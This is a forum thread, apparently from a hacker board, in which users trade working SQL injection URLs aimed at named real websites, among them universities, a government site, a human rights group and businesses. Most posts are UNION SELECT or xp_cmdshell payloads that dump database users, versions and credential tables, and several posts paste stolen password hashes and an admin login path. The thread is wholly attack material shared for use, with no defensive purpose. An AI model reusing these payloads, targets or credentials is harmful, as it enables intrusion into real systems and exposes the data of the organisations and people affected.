SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. guest3297

    guest3297 Banned

    Henk
    http://www.albatros-travel.dk/main.asp?product_id=1'+or+1=(@@version+);exec+master..xp_cmdshell+[dir+C:\]--
     
  2. guest3297

    guest3297 Banned

    Yeah, we're such hackers...

    http://www.unpan.org/autoretrieve/regional_focus.asp?region=europe&focus=1'%20or%201%3D%28select%20%27records%3A%27%2bcast%28count%28*%29%20as%20nvarchar%29%20from%20stellent..Users%20%20%20%29--

    Sob sob (((=
     
  3. The_HuliGun

    The_HuliGun Elder

    www.maineservicecommission.gov
    Code:
    http://www.maineservicecommission.gov/MVF/article.php?ID=-1+union+select+1,2,user(),version(),database(),6,7,8,9,10,11,12,13/*
    
    job.nenu.edu.cn
    Code:
    http://job.nenu.edu.cn/student/schshow.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17,user,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+mysql.user/*
    
    root:69aa6ce56e31ae92
     
    #2703 The_HuliGun, 15 Jul 2007
    Last edited: 15 Jul 2007
    1 person likes this.
  4. Dr.Frank

    Dr.Frank Elder

    http://panicprice.com.ua/?event=search_like_product&id=-168682+union+select+concat_ws(0x203a20,table_schema,table_name)+from+information_schema.tables--&cId=-675
     
  5. Zitt

    Zitt Elder

    http://www.estcoenterprises.com/display_lines.php?cat_id=-9999+union+select+1,2,password+from+users/*

    Either I'm missing something, or there is no login table (or anything like it), there's only passw... And the password works as login\password
    http://www.estcoenterprises.com/admin/
     
  6. Dr.Frank

    Dr.Frank Elder

    http://www.mvservice.ru/price.php?do=5&open=380&popen=-1712+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3--&PHPSESSID=bf6f6d643c1f4e053c50090464152c87

    Version four, output is in the page title
     
  7. Dr.Frank

    Dr.Frank Elder

    http://www.devmaster.net/ - a programmers' site... =(

    http://www.devmaster.net/articles.php?catID=-6+union+select+1,convert(concat(user(),0x3a,database(),0x3a,version())+using+latin1)/*


    No idea what this is:
    http://www.sev.com.au/news.php?articleid=-3608+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12


    Human Rights Resource Center:
    http://www.hrusa.org/field/listings.php?catid=-2+union+select+concat(version(),0x3a,database(),0x3a,user(),0x3a,name,0x3a,password),2,3,4+from+users/*
    admin:59395e208ea9aa41f94f1cfabe62dcad

    iPod? =)))))))
    http://www.ipoding.com/index.php?catid=-11+union+select+1,2,3,4,5,6,7,concat(version(),0x3a,database(),0x3a,user()),9,10,11,12,13,14,15,16,17,18,19,20,21/*
     
    #2707 Dr.Frank, 15 Jul 2007
    Last edited: 15 Jul 2007
  8. Extremal

    Extremal Elder

    Code:
    http://megaload.megalan.tv/catalog.php?id=-1+union+select+1,concat_ws(0x3a,login,psw)+from+megaload_auth+limit+0,1/*
    Code:
    http://dj.chem.msu.ru/person.php?id=-165+union+select+1,2,3,concat_ws(0x3a,login,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+users/*
     
    #2708 Extremal, 15 Jul 2007
    Last edited: 16 Jul 2007
    2 people like this.
  9. Constantine

    Constantine Elder

    http://www.hairstudio.ro/sex.php?id=-5+union+select+1,count(table_name),user(),4+from+information_schema.tables/*
    user=\
     
  10. ENFIX

    ENFIX Elder

    Duke News =\
    Code:
    http://www.dukemednews.duke.edu/news/article.php?id=-9583+UNION+SELECT+user(),2,version(),4,database(),concat(user,0x3a,password),7,8+from+mysql.user/*
    root:623460e26f081bbc
    web:761b2fc844890384
    mnogosearch:0547d8b07eba42f3
    =\
     
  11. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    =\\

    email+password
     
  12. ENFIX

    ENFIX Elder

    David Levine's Economic and Game Theory Page =\
    Code:
    http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
    http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,version(),0x3a,database()),12,13/*
    http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,concat(user,0x3a,password),12,13+from+mysql.user/*
    http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.tables/*
    

     
  13. tbody

    tbody Member



    Ebusiness (id, FirstName, LastName, Company, Position, Address1, Address2, State, Zip, Country, Telephone, Fax, Email, Occupation, Newsletter, WeeklyWrap, MoreInfo, MoreInfo2)

    EMailArticleUsers

    OnlineMagazines (id, Published, industry, IssueNo, Description, Link, Img, Counter)

    PASSWORD (PERSONCODE, EVENTCODE, CHECKED)
     
  14. V1p-eR

    V1p-eR Elder

    Code:
    http://edu.direktor.ru/lib/author.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6/*
    Code:
    http://edu-net.khb.ru/index.php?page=news&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8/*
     
  15. dudits

    dudits Banned

    http://info.l2r.ru/?part=items&id=1+or+1=@@version--

    Can anyone tell me what to do next to get access to the site's DB? It's not working for me :(
     
  16. ENFIX

    ENFIX Elder

    Princeton University Program for Law and Public Affairs
    root:*74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3

    "/etc/passwd"
    
    Httpd.conf
     
  17. Y.Dmitriy

    Y.Dmitriy Banned

    LOL, supposedly a site for IT specialists :)
     
    1 person likes this.
  18. Shram-spb

    Shram-spb Member

    this way is better..

    Code:
    http://www.lookit.biz/news.php?viewcount=300&viewtype=3&pt=-1+union+select+1,2,3,concat_ws(char(58),acc_login,convert(acc_pwd%20using%20cp1251),acc_email),5,6+from+account/*
    Only I just can't figure out the password encoding :(
     
  19. tbody

    tbody Member

    Take a look here
    http://blogs.xnet.lv/index.php?zoomzina=2532+union+select+1,2,3/*
     
  20. ENFIX

    ENFIX Elder

    Code:
    http://blogs.xnet.lv/index.php?zoomzina=-2532+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database()),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16/*
    
     